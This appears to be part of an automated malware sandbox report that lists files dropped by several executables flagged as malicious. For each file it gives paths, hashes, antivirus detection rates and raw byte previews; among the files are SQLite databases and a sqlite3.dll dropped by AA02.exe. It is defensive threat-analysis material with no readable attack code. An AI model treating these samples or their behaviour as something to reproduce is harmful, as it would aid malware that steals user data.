                                                                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.3.6.<./.P.i.d.>.......
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER543C.tmp.xml
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4685
                                                                                                                                                                                Entropy (8bit):4.481319431173112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:cvIwSD8zsrJgtWI99wjZyWSC8Bq8fm8M4JY28qFks4+q8v88HBizdz9d:uITfF6wjZTSNlJYzLK1Mzdz9d
                                                                                                                                                                                MD5:FA46A494E899F7539AB9219E49978456
                                                                                                                                                                                SHA1:B2A0E57D512AF9D5B28EDC50AE5A6DF819BA3C04
                                                                                                                                                                                SHA-256:5974A25349F5ADC7E3836CB533D4650C6A90D2A201B570B782E0E55F798C98E7
                                                                                                                                                                                SHA-512:FE59493C6065F494B7E0F99773614CF934969C236B7FBCED301B3DDAA90632360101969C73FC219CF10AE540D5D7A43CD0D70165DA6BF80E970FA47B976EBB5E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1278915" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                C:\ProgramData\sqlite3.dll
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):645592
                                                                                                                                                                                Entropy (8bit):6.50414583238337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C169.exe.log
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):700
                                                                                                                                                                                Entropy (8bit):5.346524082657112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EE61.exe.log
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1192
                                                                                                                                                                                Entropy (8bit):5.359562127686337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhuE4KaE4q0E4KiZhnRAE4Kzr7r1qE4UE4Ks:MxHKXwYHKhQnouHKaHxHKipAHKzvr1qq
                                                                                                                                                                                MD5:26BF5ED58FB6D9EEDD639F036FC882FE
                                                                                                                                                                                SHA1:21C3BFFF881964A836C3489507EAF36CD4BA652D
                                                                                                                                                                                SHA-256:2998ED6B8D1EB85DE8BEE772CEF62D57ED40224EECFE4349C3275F0C7AA96542
                                                                                                                                                                                SHA-512:F7B54F1EFC414567AD547823B8A178F562309507F91FF54EE3FDABF4D5AC8B3E9450E2A261D3CD6A34430E2ADF1D3354A82EA1E58A7362A207EA659304B80428
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml.Linq, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\f54e3a73bfefb71eb6e1de09129af7f0\System.Xml.Linq.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):645592
                                                                                                                                                                                Entropy (8bit):6.50414583238337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\890R9H47
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):118784
                                                                                                                                                                                Entropy (8bit):0.4589421877427324
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                                                                                                                                MD5:16B54B80578A453C3615068532495897
                                                                                                                                                                                SHA1:03D021364027CDE0E7AE5008940FEB7E07CA293C
                                                                                                                                                                                SHA-256:75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
                                                                                                                                                                                SHA-512:C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\A70A.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1285856
                                                                                                                                                                                Entropy (8bit):7.290553475161652
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:wAvkNkBobrsLgjMTarTbEzqFyyLGPaz8sMRK7wD9x3TOs7:n80iTjMTaf7iPaWRiwDf3TX
                                                                                                                                                                                MD5:31F17AD58D02772DF14EFAC37D416CD7
                                                                                                                                                                                SHA1:BC8EA09D50B5B794AF6C741B0C2D39C637831913
                                                                                                                                                                                SHA-256:21F7623006B248709A14CBFC507187FD44A8ADA2D0DD465FAA79317ECE02DC78
                                                                                                                                                                                SHA-512:7B3E94C7D808CF779704D33893D7B8EE9F56E445BE554B18A1F7476016AB68D2463F78A1278B1DAA6F8D4DD26535E1A50DA8A33412428E977D0659B8388B56DE
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ.....o...g.'.:.( =.&../..`.O....O[.E..vi|.DC..[A...........Q..............................................................................................................................................................................................PE..L....x................0......r........... ...@....@.................................\.....@..................................P.......`..Xo...................................................................................................................@.............................`.............P......................@....rsrc...Xo...`..Xo..................@..@.........@.......(...v..............@.....................................................................................................................................................................................................................................................................................................................+.........../.\.;3)x)n...s.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):351744
                                                                                                                                                                                Entropy (8bit):6.209230188012359
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:LSZSB++2B2wScyH3/in9HQnIlf6BXcFNuAnYeOeNIqz1D+Jr:LSZSB+l2wScyH3/in9HQnI16BMFlnYe2
                                                                                                                                                                                MD5:349A409711C0A8F53C5F90A993A621F2
                                                                                                                                                                                SHA1:1A6A7E224441F3DEB794AD7C05BB337FEF53BB4A
                                                                                                                                                                                SHA-256:3601F18238F48E931AE54A92D8FC208AE9AB8B2A75ED898C7712048ABBC038B7
                                                                                                                                                                                SHA-512:E56482C233FEA482392D16BCF64046DCE24CCF1FE13737E0298E5003EAC3A35258220F605F8CE3F81F876935C813B9DCBCEB942A7A71D00C424E5CCE01B4BC97
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L......_.....................@......@.............@..........................p.......E..........................................(........@...................0..0.......................................@...............l............................text............................... ..`.data...@...........................@....rsrc....@.......B..................@..@.reloc...;...0...<..."..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):336896
                                                                                                                                                                                Entropy (8bit):6.095936411614306
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:/PqsnKEQOJNhlS35U3TiXtHRW4YcT3XI6Ndc9NQ49UTiJFS:nnnKZOJNhlS35U3TiXtHRW4xT3Y649NW
                                                                                                                                                                                MD5:CBC4BD8906093C0CCC55379319D65DB1
                                                                                                                                                                                SHA1:27C67774153EDD261DB48ADA6477F1DC3D79447B
                                                                                                                                                                                SHA-256:571643F0741F9F26094CD42879636D79A3A1B196EF560438A8F74877CFD106A4
                                                                                                                                                                                SHA-512:4D9753369E6D500542B87DA950021CF41553BA99CE6357E00DDDCBC8ED7179ABB29D8A4902EC0936863BEA9C79B09173FE699014025F9DDA54D56228185C62CC
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L......_.....................@....................@..........................@.......n..........................................(........@......................0...................................8...@...............l............................text...>........................... ..`.data...@...........................@....rsrc....@.......B..................@..@.reloc...;.......<..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\BIMO8YMO
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                Entropy (8bit):0.792852251086831
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):397824
                                                                                                                                                                                Entropy (8bit):3.7269481746723154
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:aE8ijGrr1Lj3crjEn2dLkbi2dX4Q4qQO8:UiT3
                                                                                                                                                                                MD5:5115E5DAB211559A85CD0154E8100F53
                                                                                                                                                                                SHA1:347800B72AC53EC6E2C87E433763B20282A2C06D
                                                                                                                                                                                SHA-256:EF156FB3A203FE197D89D63E2EA7805A1B9AF505DFFF5A58532DBFE34E7AABAA
                                                                                                                                                                                SHA-512:D03E58376BE1E299A6DA57A28ED5DB176999BADED713AA54DDB59CF8C82B97E8C0B028CE07BDDB6989C7C77E518E151E112DDE2F1D5244AC2572E4371FA68C12
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.q...............0..............(... ...@....@.. ....................................@..................................(..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H......../..\............................................................0..........~....u....s....z&.....*.................2(.... ....j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......r...p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..E.......~.....s.......8"........
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\D375.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2740224
                                                                                                                                                                                Entropy (8bit):7.959483373293049
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:MChUuz9ubrD0rNoVNsLdq0MTq24FdizzlzKGg6W6SYjUN+dCo:vUuxGD0iVNsL9cqtdi8GE6hA+3
                                                                                                                                                                                MD5:CA16CA4AA9CF9777274447C9F4BA222E
                                                                                                                                                                                SHA1:1025ED93E5F44D51B96F1A788764CC4487EE477E
                                                                                                                                                                                SHA-256:0016755526279C5C404B670ECB2D81AF46066D879C389924A6574AB9864B5C04
                                                                                                                                                                                SHA-512:72D8D2A729B8CE2940235D3A317EE3EB0EB8D1411E847D6D11E36484F520BB88B3CABD03716B3C2988B0A053426BE14AACE154F13D306883788F952CD03CF712
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........LC.y.C.y.C.y.W.z.H.y.W.|..y.W.}.Q.y.W.~.B.y...}.R.y...z.V.y...|.i.y.W.x.P.y.C.x..y...p.D.y....B.y...{.B.y.RichC.y.........................PE..L...w7.a.................@...........RF......P....@.......................... n......*...@......................................................................................................................................................... .>.......................... ..` .....P...P..................@..@ $....0......................@... .....P......................@..@ ."...`......................@..B.idata..............................@....rsrc...............................@..@.themida..A.........................`....boot.....'..PF...'.................`..`........................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\D466.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):163328
                                                                                                                                                                                Entropy (8bit):6.266388012405613
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:qkqeuZi3xqvmqEzkC34ygPsAXtITmUYasQ2:VXuk3EvmqEgS4jlLay
                                                                                                                                                                                MD5:DF13FAC0D8B182E4D8B9A02BA87A9571
                                                                                                                                                                                SHA1:B2187DEBC6FDE96E08D5014CE4F1AF5CF568BCE5
                                                                                                                                                                                SHA-256:AF64F5B2B6C4CC63B0CA4BB48F369EBA1629886D85E289A469A5C9612C4A5EE3
                                                                                                                                                                                SHA-512:BC842A80509BDA8AFFF6E12F5B5C64CCF7F1D7360F99F63CEBBC1F21936A15487EC16BDE3C2ACFF22C49EBCEDF5C426621D6F69503F4968AACC8E75611E3A816
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...S.._.................B....t......*.......`....@..........................@v.....x[......................................D...x.....u..............................a.................................@............`..d............................text...P@.......B.................. ..`.rdata..~....`.......F..............@..@.data...`us.........................@....fefeg..r.....u.....................@..@.guyus..p.....u.....................@..`.venu.........u.....................@..`.rsrc.........u.....................@..@................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):1143000
                                                                                                                                                                                Entropy (8bit):7.2472305489572335
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:N6e6+O/RK8MmtDX5f11XNbW/kjvULGaPBUcXTE/RFia0/1AtBVEOi2vU86N1A:kHc8L59HbViGaJUck1iAtBVEN2vX6zA
                                                                                                                                                                                MD5:97617914D6E8A6E3CBEE8A5E5FF39AA5
                                                                                                                                                                                SHA1:CAF7FEF0EFD3DBCF176C7CFC85CC545DD0DC9EFD
                                                                                                                                                                                SHA-256:7C1C287F9CE0D8D90C95851781FF2732780177F6C1AFFECC9EED376436981112
                                                                                                                                                                                SHA-512:F4C79F9E41124044AA1D0A44E86D0A184BEDA33163D7B0973DC23B4FF5087C708175BD89F73FFC2C160A66BF23F09835C422B654353DC67CB59EA053CF60EABB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.i...............0..`...........~... ........@.. ...............................5....@.................................P~..K....................h............................................................... ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@....reloc...............f..............@..B.................~......H............_...........w......}......................................B(....~S...(....*....0.............*B(....~S...(....*.......*...B(....~S...(....*.......*.......*....0.............*.0.............*.0.............*B(....~S...(....*.......*.......*.......*....0.............*B(....~S...(....*.......*....0.............*.0.............*.0.............*.0.............*B(....~S...(....*....0.............*.0.............*B(....~S...(....*....0.............*.0.............*.0..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\LXBAIMOP
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.6970840431455908
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\PZMY5PHV
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                Entropy (8bit):1.1874185457069584
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
